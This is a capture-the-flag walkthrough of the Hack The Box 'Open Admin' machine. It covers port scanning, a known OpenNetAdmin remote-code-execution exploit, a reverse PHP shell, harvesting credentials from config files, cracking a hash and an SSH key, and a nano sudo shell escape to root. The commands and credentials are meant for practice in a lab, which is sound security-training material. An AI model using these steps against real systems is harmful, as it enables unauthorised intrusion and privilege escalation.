Hack The Box: Open Admin


Enumeration

box admin

The nmap scan reveals only one port: Port 22 and port 80 with a apache web server.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf🇩🇪bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The website only shows a standard Apache welcome page, but after starting a gobuster scan, we get several hits for subdirectories. The first hit is music/, which leads to a kind of streaming page:

box admin

and artwork/, which seems like a startup consulting service.

box admin

Browsing the sites reveals that the pages are templates where most of the services are only front-end. However, checking the target’s site map in burp suite shows something interesting:

box admin

It seems that some files and data is hosted on the webserver which should actually not be publicly available (like apache configuration files), and the ona/ directory leads to a OpenNetAdmin dashboard:

box admin


Initial Foothold

We are already informed that the installed version is not the latest one. ExploitDB shows a RCE vulnerability for this exact version, so let’s try it… and it works!

❯ ./exploit.sh http://10.129.107.188/ona/
$ whoami
www-data
$ 

Then I uploaded a reverse PHP shell and got a netcat shell that can be upgraded to a TTY with help of python. Then I started looking around for credentials and found something in the database settings:

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

And with these passwords, we can log in as user jimmy.


Privilege Escalation

While looking around on the server, I already noticed that there is a directory /var/www/internal belonging to jimmy. Since jimmy’s home folder is empty and he also doesn’t have any sudo permissions, I started checking this directory. It contains three PHP files. Already the first one gives a hit: A hashed version of a password.

if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {

It seems that this password leads to joanna’s SSH keyfile:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Next, I tried to access the page itself. netstat -tulpn revealed that it is running on port 52846, and it is also confirmed by the apache configuration. Interestingly the page is running as joanna.

Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

So let’s try to access it from there.

$ ssh jimmy@<ip> 52857:localhost:52846

box admin

Then I got stuck, because I couldn’t crack the password with hashcat and the rockyou-wordlist. However, I later noticed that it is also contained in the crackstation-database:

box admin

An alternative way would have been to upload a webshell to the folder.


Privilege Escalation

Now that we have the key, we need to change its permissions and crack the password with ssh2john. This time the rockyou-worklist works and we can log in as user joanna.

The privilege escalation is very easy: sudo -l shows that joanna can execute the command /bin/nano /opt/priv as sudo, and with help of GTFObins we can use that to get root:

$ sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0